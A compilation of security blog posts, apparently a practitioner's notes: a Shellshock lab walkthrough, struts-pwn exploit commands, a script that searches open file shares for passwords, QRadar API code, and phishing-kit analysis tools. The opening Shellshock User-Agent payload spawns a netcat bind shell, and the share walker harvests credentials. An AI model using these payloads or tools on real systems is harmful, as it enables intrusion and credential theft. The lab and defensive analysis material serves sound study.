when practicing pen testing on CVE-2014-6271 (Shellshock)
in Burp Suite, proxy a request, send it to Repeater and modify the User-Agent header so it carries a bash function definition followed by the command you want run
GET / HTTP/1.1
Host: xxx.xxx.xxx.xxx
User-Agent: () { :;}; /usr/bin/nc -l -p 9999 -e /bin/sh
Repeater will not get a response because the target is now blocked in netcat waiting for a connection on port 9999
open another prompt and use netcat to connect to port 9999
nc xxx.xxx.xxx.xxx 9999
you are now at a /bin/sh prompt on the compromised system, so you can type a command like
"whoami"
note: -e only exists in netcat builds that support it (nc.traditional, ncat); the OpenBSD netcat shipped by many distributions does not have it, and the bind shell on 9999 is reachable by anyone who can reach the host, so keep this to an isolated lab
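Before firing a bind shell it helps to confirm the target is actually running the vulnerable bash in a CGI handler, and on the defensive side the same pattern is what you look for in proxy logs. The script below is an added example and is not from the original post: it builds the same kind of request shown above with a harmless echo payload, checks the response for a marker that can only appear if bash evaluated the function definition, and flags any request header carrying a Shellshock-style definition. The CGI path /cgi-bin/test.cgi and the host are assumptions, not values from the post.

```python
# Added example (not from the original post): Shellshock probe and header check.
import re
import socket

# The trigger is a bash exported-function definition "() {" with trailing
# commands after the closing brace. Requiring the closing "};" keeps benign
# User-Agent strings like "Mozilla/5.0 (X11; Linux)" from matching.
SHELLSHOCK_RE = re.compile(r"\(\)\s*\{[^}]*\}\s*;")

# Non-destructive probe. "echo; echo;" ends the CGI headers so the marker lands
# in the response body instead of producing a 500. The marker is split with ""
# inside the payload so a page that merely reflects the User-Agent cannot
# produce "SHELLSHOCK"; only bash concatenating the two halves can.
PROBE_PAYLOAD = '() { :;}; echo; echo; /bin/echo SHELL""SHOCK'
PROBE_MARKER = "SHELLSHOCK"


def build_request(host, path="/", header="User-Agent", payload=PROBE_PAYLOAD):
    """Raw HTTP/1.1 request (bytes) carrying the payload in one header."""
    lines = [
        "GET {} HTTP/1.1".format(path),
        "Host: {}".format(host),
        "{}: {}".format(header, payload),
        "Connection: close",
    ]
    return ("\r\n".join(lines) + "\r\n\r\n").encode()


def find_shellshock_headers(raw_request):
    """Detection side: names of request headers whose value contains a
    Shellshock-style function definition, e.g. from a logged raw request."""
    text = raw_request.decode(errors="replace")
    head = text.split("\r\n\r\n", 1)[0]
    hits = []
    for line in head.split("\r\n")[1:]:      # skip the request line
        name, sep, value = line.partition(":")
        if sep and SHELLSHOCK_RE.search(value):
            hits.append(name.strip())
    return hits


def probe(host, port=80, path="/cgi-bin/test.cgi", timeout=5):
    """Send the probe; True only if the marker came back in the response.
    The CGI path is an assumption, adjust it to the target."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        s.sendall(build_request(host, path))
        data = b""
        while True:
            chunk = s.recv(4096)
            if not chunk:
                break
            data += chunk
    return PROBE_MARKER.encode() in data


if __name__ == "__main__":
    import sys
    target = sys.argv[1] if len(sys.argv) > 1 else "xxx.xxx.xxx.xxx"
    print("vulnerable" if probe(target) else "no marker returned (patched, or not a bash CGI)")
```

Run it against the lab host first; only if the marker comes back is the bind-shell payload from the Burp walkthrough worth sending. The same header check, pointed at a reverse proxy's raw request log, catches the exploitation attempt regardless of which header (User-Agent, Cookie, Referer) the payload is in.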
Sunday, December 23, 2018
CVE-2014-6271 walk through
Labels: burp suite, cve, cve-2014-6271, netcat, Shellshock
CVE: 2017-9805 - Apache Struts2 Rest Plugin Xstream RCE
I found this github page extremely useful when practicing pen testing on CVE: 2017-9805 - Apache Struts2 Rest Plugin Xstream RCE
https://github.com/mazen160/struts-pwn_CVE-2017-9805
Check if the vulnerability exists against a single URL.
python struts-pwn.py --url 'http://example.com/struts2-rest-showcase/orders/3'
Exploit a single URL.
python struts-pwn.py --exploit --url 'http://example.com/struts2-rest-showcase/orders/3' -c 'touch /tmp/struts-pwn'
kali metasploit website auxiliary modules
use auxiliary/scanner/http/dir_listing
use auxiliary/scanner/http/dir_scanner
use auxiliary/scanner/http/files_dir
list all nmap scripts available
to see all the nmap scripts available you can list out this directory
ls /usr/share/nmap/scripts/
vmware tools kali linux vmplayer
if you have Kali Linux and VMware Tools isn't working in VMware Player, follow these instructions
http://www.vmwarearena.com/how-to-install-vmware-tools-on-kali-linux/
basically
1.) in vmplayer, manage -> install vmware tools
2.) open cd rom in kali
3.) copy .tar.gz to kali
4.) extract the .tar.gz
5.) run the vmware-install.pl
6.) choose all the defaults
7.) boom, vmware tools works again (like copy & paste to/from host)
dirbuster wordlist folder location
If you need a wordlist of directory names for the DirBuster tool, they are located here on a default Kali install
/usr/share/wordlists/dirbuster/
Saturday, December 22, 2018
apt-get update fails on Kali KEYEXPIRED
if
apt-get update
fails on Kali with an error like this
Get:1 http://kali.download/kali kali-rolling InRelease [30.5 kB]
Err:1 http://kali.download/kali kali-rolling InRelease
The following signatures were invalid: KEYEXPIRED 1517583136 KEYEXPIRED 1517583136 KEYEXPIRED 1517583136 KEYEXPIRED 1517583136 KEYEXPIRED 1517583136
Fetched 30.5 kB in 8s (3,483 B/s)
Reading package lists... Done
W: An error occurred during the signature verification. The repository is not updated and the previous index files will be used. GPG error: http://kali.download/kali kali-rolling InRelease: The following signatures were invalid: KEYEXPIRED 1517583136 KEYEXPIRED 1517583136 KEYEXPIRED 1517583136 KEYEXPIRED 1517583136 KEYEXPIRED 1517583136
W: Failed to fetch http://http.kali.org/kali/dists/kali-rolling/InRelease The following signatures were invalid: KEYEXPIRED 1517583136 KEYEXPIRED 1517583136 KEYEXPIRED 1517583136 KEYEXPIRED 1517583136 KEYEXPIRED 1517583136
W: Some index files failed to download. They have been ignored, or old ones used instead.
The fix is to install the current archive keyring; these 2 commands fetch it and install it (fetch it over HTTPS as shown, since this package is what apt will trust for signature checks from now on)
wget https://http.kali.org/kali/pool/main/k/kali-archive-keyring/kali-archive-keyring_2018.1_all.deb
apt install ./kali-archive-keyring_2018.1_all.deb
Thursday, December 20, 2018
Qradar API basics
This is where you can find documentation on your qradar api's instance
https://<your qradar url>/api_doc
this tells you about all the various api calls available
you can make calls directly in the browser if your credentials have permission by going to a url such as
https://<your qradar url>/api/siem/offenses
this older blog post gives you more details about connecting the 1st time
https://neonprimetime.blogspot.com/2016/01/qradar-siem-api-101-walk-through.html
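Browsing to /api/siem/offenses works for a quick look, but from a script you want a token instead of browser credentials, paging so a busy SIEM does not hand back thousands of offenses at once, and proper certificate handling for the appliance. The following is an added example, not code from the post: the SEC header (an authorized-service token), the Range header and the filter syntax are taken from the QRadar REST API documentation rather than from the post, and the offense JSON is a constructed sample in the shape that endpoint returns.

```python
# Added example (not from the original post): query QRadar offenses with a
# service token and summarize the open ones.
import json
import ssl
import urllib.parse
import urllib.request


def build_offense_request(base_url, sec_token, filter_expr=None, first=0, last=49):
    """GET /api/siem/offenses with token auth and result paging.

    SEC carries an authorized-service token created in the QRadar console
    (assumed here; the post uses browser credentials). Range pages the result
    set; filter_expr is QRadar's filter syntax, e.g. status="OPEN".
    """
    url = base_url.rstrip("/") + "/api/siem/offenses"
    if filter_expr:
        url += "?" + urllib.parse.urlencode({"filter": filter_expr})
    headers = {
        "SEC": sec_token,
        "Accept": "application/json",
        "Range": "items={}-{}".format(first, last),
    }
    return urllib.request.Request(url, headers=headers)


def fetch_json(req, cafile=None):
    """Perform the request. Point cafile at the appliance's (self-signed) CA
    instead of turning verification off."""
    ctx = ssl.create_default_context(cafile=cafile)
    with urllib.request.urlopen(req, context=ctx) as resp:
        return json.loads(resp.read().decode())


def summarize_offenses(offenses, top=5):
    """Open offenses, highest magnitude first, as (id, magnitude, description)."""
    open_ones = [o for o in offenses if o.get("status") == "OPEN"]
    open_ones.sort(key=lambda o: (-o.get("magnitude", 0), o["id"]))
    return [(o["id"], o.get("magnitude", 0), o.get("description", "").strip())
            for o in open_ones[:top]]


# Constructed sample in the shape of the offenses endpoint's JSON (not real data).
SAMPLE_OFFENSES = [
    {"id": 101, "status": "OPEN", "magnitude": 7, "description": "Multiple Login Failures\n"},
    {"id": 102, "status": "CLOSED", "magnitude": 9, "description": "Malware Beacon"},
    {"id": 103, "status": "OPEN", "magnitude": 9, "description": "Exploit Followed by Scan"},
]

if __name__ == "__main__":
    import os
    base = os.environ.get("QRADAR_URL", "https://<your qradar url>")   # assumed env var
    token = os.environ.get("QRADAR_TOKEN", "")
    if token:
        offenses = fetch_json(build_offense_request(base, token, 'status="OPEN"', 0, 49),
                              cafile=os.environ.get("QRADAR_CA"))
    else:
        offenses = SAMPLE_OFFENSES
    for oid, mag, desc in summarize_offenses(offenses):
        print("{0}\t{1}\t{2}".format(oid, mag, desc))
```

With no token in the environment the script runs against the constructed sample; with one it makes the real call. The endpoint and field names (id, status, magnitude, description) can be confirmed in the api_doc page referenced above.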
py2exe does not work on python 3.6, use pyinstaller instead
py2exe does not work on python 3.6
use pyinstaller instead
py2exe throws this error
"IndexError: tuple index out of range"
so instead I get pyinstaller by doing this
> pip install pyinstaller
and then running
> pyinstaller.exe --onefile myscript.py
and it generates a working EXE
openFileShareWalker.py
# open file share searcher for passwords or restricted documents
import argparse
import os
import re

#definitions
suspiciousFileNames = r'(?i)(\.config|\.txt|\.ini|\.pdf|\.doc|\.xls|\.java|\.sql|\.vbs|\.inf|pwd|password)'
passwordSearchableFileNames = r'(?i)(\.config|\.txt|\.ini|\.java|\.sql|\.vbs|\.inf)'
passwordKeywords = r'(?i)(pwd|password|passwd|getConnection|connectionString)'
falsePositiveFolders = r'(?i)(EPO_REPOSITORY|VSCANDAT|AdaptivaCache|SmsPkg|DriverPkg)'
falsePositiveFileNames = r'(?i)(license|avvdat|uninst)'
suspiciousFiles = []
passwordFiles = []
fileCount = 0
progressInterval = 10000
progressTracker = progressInterval

#arguments
arguments = argparse.ArgumentParser("Search Open File Shares for passwords and restricted documents")
arguments.add_argument("-f", "--folder", type=str, required=True, help=r"Full UNC path (\\server\share) of open file share to search (note: file:// does not work)")
arguments.add_argument("-d", "--debug", action="store_true", required=False, help="Enable debugging messages")
arguments.add_argument("-p", "--progress", action="store_true", required=False, help="Enable progress tracking")
settings = arguments.parse_args()

#processing
# pass 1: walk the share and collect files whose names look interesting
if(settings.debug or settings.progress):
    print("starting walk of folder '{0}'".format(settings.folder))
for dname, dirs, files in os.walk(settings.folder):
    if(settings.debug):
        print("starting walk of sub-folder '{0}'".format(dname))
    for fname in files:
        fileCount = fileCount + 1
        fpath = os.path.join(dname, fname)
        if(settings.progress and fileCount >= progressTracker):
            print("PROGRESS: {0} files analyzed so far".format(str(fileCount)))
            progressTracker = progressTracker + progressInterval
        if(settings.debug):
            print("analyzing file '{0}'".format(fname))
        # skip known-noisy folders (AV repositories, SCCM caches, driver packages)
        folderBadMatch = re.search(falsePositiveFolders, fpath)
        if(folderBadMatch is None):
            match = re.search(suspiciousFileNames, fname)
            if(match is not None):
                fileBadMatch = re.search(falsePositiveFileNames, fname)
                if(fileBadMatch is None):
                    if(settings.debug):
                        print("matched file '{0}'".format(fpath))
                    suspiciousFiles.append(fpath)
        if(settings.debug):
            print("finished analyzing file '{0}'".format(fname))
    if(settings.debug):
        print("finished walk of sub-folder '{0}'".format(dname))
if(settings.debug):
    print("finished walk of folder '{0}'".format(settings.folder))

# pass 2: grep the text-like matches for password keywords
# (errors="ignore" keeps a binary or oddly-encoded file from aborting the whole run)
if(settings.debug or settings.progress):
    print("starting password searching")
for file in suspiciousFiles:
    isSearchable = re.search(passwordSearchableFileNames, file)
    if(isSearchable is not None):
        if(settings.debug):
            print("searching for passwords in '{0}'".format(file))
        try:
            with open(file, errors="ignore") as f:
                for line in f:
                    match = re.search(passwordKeywords, line)
                    if(match is not None):
                        passwordFiles.append((file, line.rstrip("\r\n")))
        except OSError as e:
            print("could not read '{0}': {1}".format(file, e))
if(settings.debug):
    print("finished password searching")

#output
for file in suspiciousFiles:
    print(file)
for (file, line) in passwordFiles:
    print("POSSIBLE PASSWORD in '{0}' [{1}]".format(file, line))
Wednesday, December 19, 2018
phishingKitTracker.py
# phishing kit parser, used to enrich kit and put into PhishingKitTracker csv format
# @neonprimetime
# https://github.com/neonprimetime/PhishingKitTracker/
import argparse
import zipfile
import urllib.request
from urllib.parse import urlparse
import os
from pathlib import Path
import re
from datetime import date
import hashlib
import shutil

#definitions
class PhishingKitTrackerEntry:
    # one csv row: one row per (kit, mailer php file, exfil email) found
    date = date.today().strftime('%m/%d/%Y')
    reference = ""
    email = ""
    emailProvider = ""
    mailer = ""
    target = ""
    domain = ""
    zip = ""
    threatActor = ""
    md5 = ""
    url = ""

entries = []
proceed = 1
domain = ""
mailer = ""
filename = ""
md5 = ""
threatActor = ""
itemList = []
isUrls = 0
extractedfoldername = ""

#arguments
arguments = argparse.ArgumentParser("Analyze Phishing Kit, pass 1 url or file to start")
arguments.add_argument("-u", "--url", type=str, required=False, help="Url to a Phishing Kit Zip file")
arguments.add_argument("-f", "--file", type=str, required=False, help="Path to a Phishing Kit Zip file")
arguments.add_argument("-d", "--debug", action="store_true", required=False, help="Enable debugging messages")
arguments.add_argument("-r", "--reference", type=str, required=False, help="Twitter url referencing Phishing Kit")
arguments.add_argument("-l", "--listUrls", type=str, required=False, help="Path to file with a list of Urls to Phishing Kit Zip files in it 1 per line")
arguments.add_argument("-i", "--listFiles", type=str, required=False, help="Path to file with a list of Phishing Kit Zip files 1 per line")
settings = arguments.parse_args()
if(settings.url is None):
    if(settings.file is None):
        if(settings.listUrls is None):
            if(settings.listFiles is None):
                if(settings.debug):
                    print("no url, file, or list param found")
                proceed = 0
                raise Exception("url (-u) or file (-f) or list (-l,-i) required")
            else:
                if(settings.debug):
                    print("list of files param found '{0}'".format(settings.listFiles))
                with open(settings.listFiles) as f:
                    for line in f:
                        itemList.append(line.rstrip("\r\n"))
        else:
            if(settings.debug):
                print("list of urls param found '{0}'".format(settings.listUrls))
            with open(settings.listUrls) as f:
                for line in f:
                    itemList.append(line.rstrip("\r\n"))
            isUrls = 1
    else:
        if(settings.debug):
            print("file param found '{0}'".format(settings.file))
        itemList.append(settings.file)
else:
    if(settings.debug):
        print("url param found '{0}'".format(settings.url))
    itemList.append(settings.url)
    isUrls = 1

#processing
if(proceed == 1):
    for item in itemList:
        # reset per-kit values so a kit without a signature does not inherit the previous kit's
        domain = ""
        threatActor = ""
        if(isUrls == 0):
            filename = item
        else:
            try:
                url = urlparse(item)
                domain = url.netloc
                filename = os.path.basename(url.path)
                if(settings.debug):
                    print("found domain '{0}'".format(domain))
                    print("found filename '{0}'".format(filename))
                urllib.request.urlretrieve(item, filename)
                if(settings.debug):
                    print("url downloaded '{0}'".format(item))
            except Exception as e:
                print("failed to download '{0}': {1}".format(item, e))
                continue
        extractedfoldername = str(Path(filename).with_suffix(""))
        if(settings.debug):
            print("getting file hash for '{0}'".format(filename))
        with open(filename, 'rb') as file:
            md5 = hashlib.md5(file.read()).hexdigest()
        if(settings.debug):
            print("unzipping file '{0}' to '{1}'".format(filename, extractedfoldername))
        try:
            with zipfile.ZipFile(filename, 'r') as zip_ref:
                zip_ref.extractall(extractedfoldername)
        except zipfile.BadZipFile as e:
            print("failed to unzip '{0}': {1}".format(filename, e))
            continue
        if(settings.debug):
            print("file unzipped to '{0}'".format(extractedfoldername))
        if(settings.debug):
            print("starting search for Threat Actor Signatures")
        # first "created by / hacked by / ..." line in any php file is taken as the actor signature
        foundActor = 0
        for dname, dirs, files in os.walk(extractedfoldername):
            if(foundActor == 0):
                for fname in files:
                    fpath = os.path.join(dname, fname)
                    extension = os.path.splitext(fpath)[1]
                    if(settings.debug):
                        print("found file '{0}' with extension '{1}'".format(fpath, extension))
                    if(extension is not None and extension == ".php"):
                        if(settings.debug):
                            print("searching file '{0}'".format(fpath))
                        # kits are often not valid utf-8; errors="ignore" keeps one bad file from aborting the run
                        with open(fpath, errors="ignore") as f:
                            line = f.read()
                        match = re.search(r'(?i)(created by|hacked by|coded by|edited by|signed by|made by)([^\r\n\=\+\"\'\,]+)\s+([\,\=\+\"\']|\-\-)', line)
                        if(match is not None):
                            threatActor = match.group(1) + match.group(2)
                            foundActor = 1
                            break
        if(settings.debug):
            print("finished search for Threat Actor Signatures")
        if(settings.debug):
            print("starting search for Threat Actor Emails")
        # every email address in a php file becomes a row, tagged with the php file (mailer) it came from
        for dname, dirs, files in os.walk(extractedfoldername):
            for fname in files:
                fpath = os.path.join(dname, fname)
                mailer = os.path.basename(fpath)
                extension = os.path.splitext(fpath)[1]
                if(settings.debug):
                    print("found file '{0}' with extension '{1}'".format(fpath, extension))
                if(extension is not None and extension == ".php"):
                    if(settings.debug):
                        print("searching file '{0}'".format(fpath))
                    with open(fpath, errors="ignore") as f:
                        line = f.read()
                    matches = re.findall(r'[\w\.-]+@[\w\.-]+', line)
                    for match in matches:
                        if(settings.debug):
                            print("found threat actor email '{0}'".format(match))
                        entry = PhishingKitTrackerEntry()
                        if(settings.reference is not None):
                            entry.reference = settings.reference
                        entry.email = match
                        entry.emailProvider = match.split('@')[1].split('.')[0]
                        entry.mailer = mailer
                        entry.domain = domain
                        entry.zip = filename
                        entry.threatActor = threatActor
                        entry.md5 = md5
                        if(isUrls == 1):
                            entry.url = item
                        entries.append(entry)
        if(settings.debug):
            print("deleting zip '{0}'".format(filename))
        if(filename is not None and filename != "" and ".zip" in filename):
            os.remove(filename)
        if(settings.debug):
            print("deleting folder '{0}'".format(extractedfoldername))
        if(extractedfoldername is not None and extractedfoldername != ""):
            shutil.rmtree(extractedfoldername, ignore_errors=True)
        if(settings.debug):
            print("finished search for Threat Actor Emails")
else:
    if(settings.debug):
        print("exiting program, proceed={0}".format(str(proceed)))

#output
for entry in entries:
    print("{0},{1},{2},{3},{4},{5},{6},{7},{8},{9},{10}".format(entry.date, entry.reference, entry.email, entry.emailProvider, entry.mailer, entry.target, entry.domain, entry.zip, entry.threatActor, entry.md5, entry.url))
Labels: Phishing, Phishing Kit, PhishingKitTracker, Python
Wednesday, December 12, 2018
regex extract zip, php, email from grep of phishingkit
after using this grep
https://neonprimetime.blogspot.com/2018/12/grep-recursively-phishing-kit-zip-for.html
in notepad++ you can regex out the zip name, php file name, and email address
replace this
\r\n([^\\]+)\\[^\r]+\\([^\\]+\.php)\:[^\r]+(\"|\')([^\"\'\r]+)(\"|\')[^\r]*
with this
\r\n\1,\2,\4
Monday, December 3, 2018
findstr recursively phishing kit zip for email
after unzipping
findstr /S "@" *.php | findstr "$" | findstr "=" | findstr ";" | findstr "." | findstr /I /V "From" | findstr /I /V "headers" |findstr /I /V "function" | findstr /I /V "key" | findstr /I /V "indexOf" | findstr /I /V "class" | findstr /I /V "isset" | findstr /I /V "@date" | findstr /I /V "server" | findstr /I /V "http" | findstr /I /V "css" | findstr /I /V "style" | findstr /I /V "?" | findstr /I /V "@eval"
Saturday, December 1, 2018
grep recursively phishing kit zip for email
find the exfiltration email address
// $send = "bad@bad.com";
grep -r -P '\=\s*.([a-zA-Z][\w\_\.]{5,20})\@([a-zA-Z0-9.-]+)\.([a-zA-Z]{2,4})' | grep -v -P '(?i)(from|headers|array|message|find|domain)'
// mail("bad@bad.com", ...)
grep -r -P 'mail\([^\r\n]+\@'
find who created it
// ------ HACKED BY Somebody ----------
grep -r -P "(?i)(Created By|Hacked by|Coded by|Edited By|Signed by|Made by)" * | grep -v function
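The grep (or findstr) output above still has to be turned into the zip,php,email rows that PhishingKitTracker wants, which the Notepad++ regex post above does by hand in the editor. The script below is an added example, not code from either post: it parses hit lines of the form kitfolder/.../file.php:matched text (the folder naming comes from the unzip loop further down, where each zip is extracted to a folder of the same name), pulls the quoted address, and de-duplicates the rows. The hit lines embedded in it are constructed, not real kit data.

```python
# Added example (not from the original posts): grep/findstr hits -> zip,php,email rows.
import re

# kit folder (named after the zip) / optional sub-folders / file.php : rest of the hit
# [^:]* keeps the path part from running into the matched text; both / and \ are accepted
# so findstr output from Windows parses too.
HIT_RE = re.compile(r"^(?P<zip>[^/\\:]+)[/\\](?:[^:]*[/\\])?(?P<php>[^/\\:]+\.php):(?P<rest>.*)$")
# a quoted address on the right-hand side of the hit ($send = "bad@bad.com"; or mail("bad@bad.com", ...))
EMAIL_RE = re.compile(r"""["']([A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,})["']""")


def parse_hit(line):
    """(zip, php, email) for one grep hit, or None if it is not a php hit with a quoted address."""
    m = HIT_RE.match(line.rstrip("\r\n"))
    if not m:
        return None
    e = EMAIL_RE.search(m.group("rest"))
    if not e:
        return None
    return (m.group("zip"), m.group("php"), e.group(1).lower())


def hits_to_rows(lines):
    """Unique (zip, php, email) rows in first-seen order."""
    seen = set()
    rows = []
    for line in lines:
        row = parse_hit(line)
        if row and row not in seen:
            seen.add(row)
            rows.append(row)
    return rows


# Constructed grep -r / findstr output, not real kit data.
SAMPLE_HITS = [
    'abc/login/mail.php:$send = "bad@bad.com";',
    "bob\\inc\\post.php:    $recipient = 'Evil@Mail.ru';",
    'test/send.php:mail("bad@bad.com", $subject, $message);',
    'abc/login/mail.php:$send = "bad@bad.com";',          # duplicate hit
    'abc/js/app.js:var x = "a@b.com";',                   # not a php file
    'test/index.php:$from = $_POST["email"];',            # no address
]

if __name__ == "__main__":
    import sys
    source = sys.stdin if not sys.stdin.isatty() else SAMPLE_HITS   # pipe grep output in, or use the sample
    for zipname, php, email in hits_to_rows(source):
        print("{0},{1},{2}".format(zipname, php, email))
```

Pipe the grep from above into it (grep -r ... | python thisscript.py) from the directory holding the extracted kit folders; with nothing on stdin it prints the rows for the constructed sample.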
unzip all files to folder with same name
unzip files to a folder with the same name
>ls
abc.zip
bob.zip
test.zip
>find . -name "*.zip" | while read filename; do unzip -o -d "`basename -s .zip "$filename"`" "$filename"; done;
>ls
abc
abc.zip
bob
bob.zip
test
test.zip
wget -i Urls.txt
download a list of #phishingkit zips
put the URLs into urls.txt, one per line
run command
wget -i urls.txt